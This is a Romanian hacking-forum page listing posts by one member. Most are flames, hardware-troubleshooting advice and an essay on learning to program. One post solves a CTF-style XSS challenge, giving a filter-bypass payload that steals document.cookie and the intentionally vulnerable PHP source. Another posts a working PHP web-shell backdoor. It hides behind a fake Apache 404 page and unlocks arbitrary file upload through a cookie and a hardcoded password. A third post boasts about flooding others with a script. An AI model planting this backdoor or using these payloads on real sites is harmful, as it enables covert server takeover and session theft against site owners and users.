Jump to content

Open

Active Members
  • Posts

    225
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Open

  1. Daca ai o tema luata de pe net, si schimbat LOGO-ul, asta nu inseamna ca este unica, Daca deschizi o comunitate de jocuri si ii faci reclama pe o comunitate de securitate, este inca o problema esentiala, daca nu ai gusturi la design (ceea ce vad ca nu ai) este inca o problema. Daca te apuci sa lucrezi pe PHPBB, si nu ai minimul de cunostinte in domeniu este inca o problema. Nici nu ai facut bine topicul si ti-am gasit atatea probleme ce tine de etica. Mai bine fa-ti o comunitate de muzica, s-ar putea sa ai mult mai mult success, deoarece comunitati de gaming sunt 1000.
  2. Daca astea erau spoturile publicitate a domnului Ponta, sigur acum era el presedinte (Noi Romanii apreciem sinceritatea)
  3. Am citit comentariile pana la pagina 4 si deja nu mai suport sa mai vad comentarii deale tale, in primul rand nu se spune "FLUD" si daca ironizezi termenul asta, nu inseamna ca esti "smecher" ci esti "Prost" in al doilea rand, tu cred ca stai ca pe ace sa iasa alt soft gen "Havij" sa nu te mai numeasca lumea havijar. In al 3-lea rand era un vers de la Bug Mafia care s-ar putea sa te ajute mult sa cresti pe comunitate: "C*aie se ridica doar acela care are sange-n p**la Care stie exact ce cuvant a scos pe gura" Nu acela care vorbeste mult si prost.
  4. @mike Multe din efectele prezentate de un calculator stricat sunt aceleasi, ba nu se aprinde, ba se aprinde 1-2 secunde, ce spui tu acolo poate fi din cauza unui scurt circuit, vezi daca sunt oxidate mufele, sau daca ai condensatorii umflati, incearca sa stergi placa de baza de praff cu un servetel si sa schimbi pasta termo conductoare, exista posibilitatea sa nu se faca bine atingere firul care leaga placa de baza la sursa (pentru alimentare) Ce spui tu acolo este ca pc-ul tau, intra in protectie imediat dupa deschidere. Ps: Cam cat de vechi este calculatorul?
  5. Challenge closed Orice mesaj privat, sau orice replay cu rezolvarea challenge-ului nu mai este luata in considerare. Rezolvare: mesaj");ale\u0072t(document.cookie);// De ce? Parametru vulnerabil este $POST = str_replace($array,null,($_POST['xss'])); [*] Pana aici tot este normal doar ca acele caractere filtrate sunt acestea $array=array("<",">"," "," ","r","'","+","=",); [*] Parametru "POST" se reflecta aici $mesaj = '<script>alert("'.(str_replace($array,null,($POST))).'")</script>'; [*] Vine in felul urmator <script>alert("parametru")</script> Acum trebuie sa iesi din script, trebuie sa inchizi acel "alert" mesaj") in codul sursa va aparea <script>alert("mesaj"); Acum poti trece sa completezi cu document.cookie, doar ca in array este blocata si litera "r" Deci trebuie sa criptezi litera respectiva deci r va deveni \u0072, Deci la sfarsit va arata cam asa mesaj");ale\u0072t(document.cookie);// Codul sursa este urmatorul. <?php error_reporting(1); if(isset($_POST['xss'])){ $array=array("<",">"," "," ","r","'","+","=",); $image = 'http://www.law.msu.edu/alumni/alumni_media/challenge.gif'; $parametru = 'POST'; $cod = "123456789"; $request = 'xss'; $POST = str_replace($array,null,($_POST['xss'])); $mesaj = '<script>alert("'.(str_replace($array,null,($POST))).'")</script>'; setcookie('salut',base64_encode('-'.$cod.'-'),time()+3600); $news = '<center><img src="'.$image.'"/><br><br><br> <form action="" method="'.$parametru.'"> <input type="text" name="'.$request.'" /> <input type="submit" name="submit" value="submit" /> </form></center>'; $rezultat = "<b><center>".htmlentities(str_replace('r',null,$POST))."</center></b>"; }else{ $image = 'http://www.law.msu.edu/alumni/alumni_media/challenge.gif'; $parametru = 'POST'; $request = 'xss'; $mesaj=' <center> <img src="'.$image.'"/><br><br><br> <form action="" method="'.$parametru.'"> <input type="text" name="'.$request.'" /> <input type="submit" name="submit" value="submit" /> </form> </center>'; } echo $news; echo $rezultat; echo $mesaj; ?>
  6. Vectorul trimis de tine, nu acctioneaza document.cookie.
  7. Link: 6f70656e2d6368616c6c616e67652e3266682e636f Dificultatea: Mediu - Hard Cerinte: Executarea codului "document.cookie" pentru a valida challange-ul. Dupa rezolvarea chlallenge-ului se trimite vectorul pe privat, Si la alegerea voastra daca vreti sa postati poza sau nu. - Castigatori - --------------------------------- @abraxyss
  8. Eu cred ca mai mult este de vina votka cu care ai asociat redbull-ul
  9. Interesant, cand isi revine site-ul o sa ma uit si eu peste.
  10. De ce cu mi se salveaza pozele in telefon? deci apas pe buton ca sa fac poza,se aude sunetul ca atunci cand faci o poza dar nu se salveaza si in colt in stanga jos e un patratel mic unde trebuia sa apara ultima poza facuta dar e gol.
  11. https://www.facebook.com/video.php?v=739332479457656 mor de ras cand vad video asta, vreau sa radeti si voi putin
  12. Si ala care a facut topicul sunt eu?!
  13. Introducere: Eu sunt programator PHP / MYSQL de aproximativ 4 ani, dar mai lucrez si in multe alte limbaje de programare, spre exemplu: Python / Perl / C++ etc... Ca sa ajung unde sunt acum nu a fost foarte greu, dar daca nu ai vointa si nu-ti place domeniul degeaba incerci deoarece nu vei avea rezultate. Primul pas in alegerea unui limbaj de programare este sa te gandesti cu care limbaj de programare te-ai intalnit tu cel mai des, si pe care l-ai inteles cat de cat, ideea este ca majoritatea programatorilor din Romania au invatat programare la facultate, deci nu prea au cunostinte despre cealalta parte a programarii, dar despre asta vom vorbi putin mai tarziu. Imaginatia si creatia trebuie sa domine, bine ar fi sa nu cititi tutoriale de pe internet, ci sa cititi carti despre limbajul ales de dumneavoastra. De ce sa citesti? Foarte simplu, tutorialele te invata ce sa faci doar in cazul ilustrat de autorul tutorialului, dar citind dintr-o carte, cu toate ca sunt notiuni care probabil le stiti, s-au o sa va para plictisitor, intelegi mai bine fenomenele si te ajuta sa-ti creezi tot odata si logica unui programator. Ce inseamna logica unui programator? Logica unui programator este o logica aparte, un programator nu este acela care stie sa foloseasca niste functii intr-un limbaj de programare. Un programator este acela care combina in mod original functii ale limbajului respectiv ca sa formeze o structura functionala. De obicei un potential programator invata functiile, dar dupa ce stii functiile trebuie sa lucrezi la partea gandirii de programator. Se castiga bani din programare? Multa lume fuge de acest domeniu deoarece spune ca este greu, si ca nu se castiga bani din asta. Dar acest lucru este absolut fals In ziua de astazi un programator mediu, care lucreaza pe cont propriu castiga cel putin 10 euro / ora Daca stam sa calculam daca lucrezi 4 ore / zi faci 40 euro, intr-o luna se fac 1200 euro in conditiile in care lucrezi 4 ore/ zi, jumatea programului de lucru normal, plus ca lucrul se face de acasa. Daca se plateste asa de bine, de ce nu se angajeaza toti programatori? Sunt multi programatori, pe multe limbaje de programare, daca stam sa ne gandim estimativ, majoritatea oamenilor care au conturi pe forumuri de securitate / jocuri online / servere etc. Au cunostinte si produc bani din lumea IT-ului. Deci sunt din ce in ce mai muti care si-au mutat locul de munca in fata unui monitor. Ce trebuie sa stiu, inainte sa ma apuc de invat un limbaj de programare In mod normal, trebuie sa aveti baza de cunostinta intr-ale informaticii, dar depinde ce domeniu va alegeti Pentru PERL / Python, eu va recomand sa va obijnuiti cu Linux-ul si cu librariile acestuia, sa explorati si sa invatati ce este un Kernel si tot felul de chitibusuri, deoarece aceste doua limbaje de programare au fost facute pentru Linux, nu pentru Windows, ca se folosesc acum si pentru Windows, este alt ceva. Pentru PHP/MYSQL/ Va recomand sa intelegeti principiile si cum functioneaza un server web, ce are la baza, ce porturi foloseste, ce protocoale foloseste, ca este un pachet de date, care este diferenta intre "UDP si TCP" si tot felul de chitibusuri din astea, ca si sfat, ca sa aveti success in programare, ar trebui sa tociti putin retelistica. Care este baza limbajelor de programare Aceasta intrebare este cam greu de raspuns, baza limbajelor de programare este Assembler, dar acum o parte din limbajele de programare aparute, sunt scrise in C. Daca invat baza unui limbaj de programare, o sa invat mai usor, restul limbajelor ce se trag din baza? Aici este un raspuns cam greu de dat, depinde foarte mult de limbajul de programare ales, din propria experienta PHP-ul l-am invatat mult mai usor, stiind C-ul. Eu spun sa studiati inainte un limbaj de programare, sa aflati care sunt asemanarile si diferentele fata de baza lui. In acest tutorial nu ai spus nimic de "HTML / CSS " desi sunt limbaje web (ceea ce lucrezi tu) Intr-adevar, nu am specificat nimic de aceste "Limbaje de programare" deoarece nu sunt limbaje de programare. HTML: nu este Limbaj de programare, ci Limbaj de marcare. CSS: (Cascading Style Sheets) este doar un standard pentru formarea elementelor intr-un document HTML nimic mai mult JavaScript (JS) este un limbaj de programare orientat obiect bazat pe conceptul prototipurilor. Este folosit mai ales pentru introducerea unor func?ionalit??i în paginile web, codul Javascript din aceste pagini fiind rulat de c?tre browser. Limbajul este binecunoscut pentru folosirea sa în construirea siturilor web, dar este folosit ?i pentru acesul la obiecte încastrate (embedded objects) în alte aplica?ii. Cat de mult conteaza securitatea cand vorbim de programare In domeniul meu, este foarte importanta securitatea, deoarece clientul depinde de mine, pe langa diplomele de programare mai detin si diplomele de la CEH (Certificated Ethical Hacker) aceste studii m-au ajutat sa inteleg mai bine fenomenele greselilor. Cand vorbim despre securitate web vorbim despre vulnerabilitati extrem de periculoase, afectand intreg serverul nu doar scriptul respectiv. Daca am ratat vre-un punct, va rog completi-ma voi.
  14. Metoda noua de impartit virusi, prin challange-uri, super tare, nu ma asteptam la asta. Si din partea RST-ului pentru tine: RUSINE!!!!!
  15. Iti dau 2 metode sa sara alerta, dar e prost webhostu de la hostinger ca-ti baga redirect.
  16. Open

    decrypt >>

    Refuz sa te mai bag in seama apropo ti-am decryptat eu parolele, dar ca sa le afli trebuie sa decryptezi si tu MD5-ul asta. 53e3bd3288b2d472253d09c726b02467
  17. Open

    decrypt >>

    Hai sa-ti demonstrez ca sunt mai destept ca tine. 1) Pe o comunitate de genul nu vii cu provocari de decryptare la Ajutor:P (Daca era provoare te duceai la challange) 2) Ce ai pus tu acolo se numesc HASH-uri nu se decrypteaza ci se sparg prin bruteforce (cu dictionar de parole) 3) Vii cu un aier superior pe aici, si nu este foarte constructiv. 4) sunt mai destept ca tine.
  18. user: ebooks pass: ebooks
  19. <?php $file = __FILE__; error_reporting(0) . if(isset($_COOKIE['parola'])){ if(isset($_POST['parola2'])){ $backdoor = $_POST['parola2']; if($backdoor == 'muieadmin'){ // Pagina de upload apare doar daca pasii sunt trecuti cu success. /* ------------------------------------------------------------------------------------------------------------- # forma de upload HTML -------------------------------------------------------------------------------------------------------------*/ echo '<style type="text/css"> body { background-color: white; font-weight: inherit; } </style> <center>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; /* ------------------------------------------------------------------------------------------------------------- #Functiile PHP de urcare fisiere -------------------------------------------------------------------------------------------------------------*/ if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b><font color="#0ACC00">Fisierul a fost incarcat cu succes!</font></b><br><br>'; } }else { echo '<b><font color="#CC0000">Fisierul nu a putut fi incarcat!</font></b><br><br></font>'; } # Se termina functia in cazul in care este falsa conditia pentru upload }else{ echo "<html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL $file was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address>Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/10.10 mod_perl/2.0.6 Perl/v5.10.1 mod_antiloris/0.4 Server at xcp.ro Port 80</address> </body></html>"; } }else{ echo "<html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL $file was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address>Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/10.10 mod_perl/2.0.6 Perl/v5.10.1 mod_antiloris/0.4 Server at xcp.ro Port 80</address> </body></html>"; } }else{ echo "<html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL $file was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address>Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/10.10 mod_perl/2.0.6 Perl/v5.10.1 mod_antiloris/0.4 Server at xcp.ro Port 80</address> </body></html>"; } /* -------------------------------------------------------------------------------------------------------------*/ ?> Va dati si voi seama ce face:)
  20. Acum ca am pus mana pe scriptu asta, va dau flood la toti sa moara mama!!!!!
  21. Si tu aici de ce esti pe langa subiect?!
×
×
  • Create New...